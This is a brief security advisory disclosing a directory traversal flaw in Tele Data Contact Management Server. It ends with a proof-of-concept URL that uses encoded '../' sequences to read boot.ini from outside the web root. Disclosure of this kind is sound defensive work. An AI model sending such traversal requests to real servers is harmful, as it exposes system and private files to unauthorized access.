Tele Data Contact Management Server Directory Traversal

`------------------------------------------------------------------------  
Software................Tele Data Contact Management Server  
Vulnerability...........Directory Traversal  
Threat Level............Serious (3/5)  
Download................http://teledata.qc.ca/td_cms/  
Discovery Date..........6/1/2011  
Tested On...............Windows XP SP3 EN  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <[email protected]>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A directory traversal vulnerability in Tele Data Contact Management  
Server can be exploited to read files outside of the web root.  
  
  
--PoC--  
  
http://localhost/%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../boot.ini  
`